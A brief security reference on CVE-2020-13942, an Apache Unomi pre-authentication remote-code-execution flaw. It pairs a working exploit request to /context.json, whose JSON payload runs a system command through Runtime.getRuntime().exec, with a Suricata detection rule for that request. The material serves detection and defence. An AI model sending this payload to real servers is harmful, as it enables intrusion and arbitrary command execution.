CVE-2020-13942 exploit
POST /context.json HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
Content-Length: 200
{"filters":[{"id" : "test","filters": [{"condition": {"parameterValues": {"test": "script::Runtime.getRuntime().exec('whoami')"},"type":"profilePropertyCondition"}}]}],"sessionId": "test"}
CVE-2020-13942 Detection rules
alert http any any -> any any (msg:"ET EXPLOIT CVE-2020-13942 Apache Unomi pre-auth RCE"; flow:established,to_server; content:"POST"; http_method; content:"/context.json"; http_uri; content:"Runtime.getRuntime()"; http_client_body; nocase; content:".exec("; http_client_body; nocase; reference:url,twitter.com/chybeta/status/1328912309440311297; reference:cve,2020-13942; classtype:attempted-admin; sid:2031120; rev:2; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2020_11_18, former_category EXPLOIT, signature_severity Major, updated_at 2020_11_18;)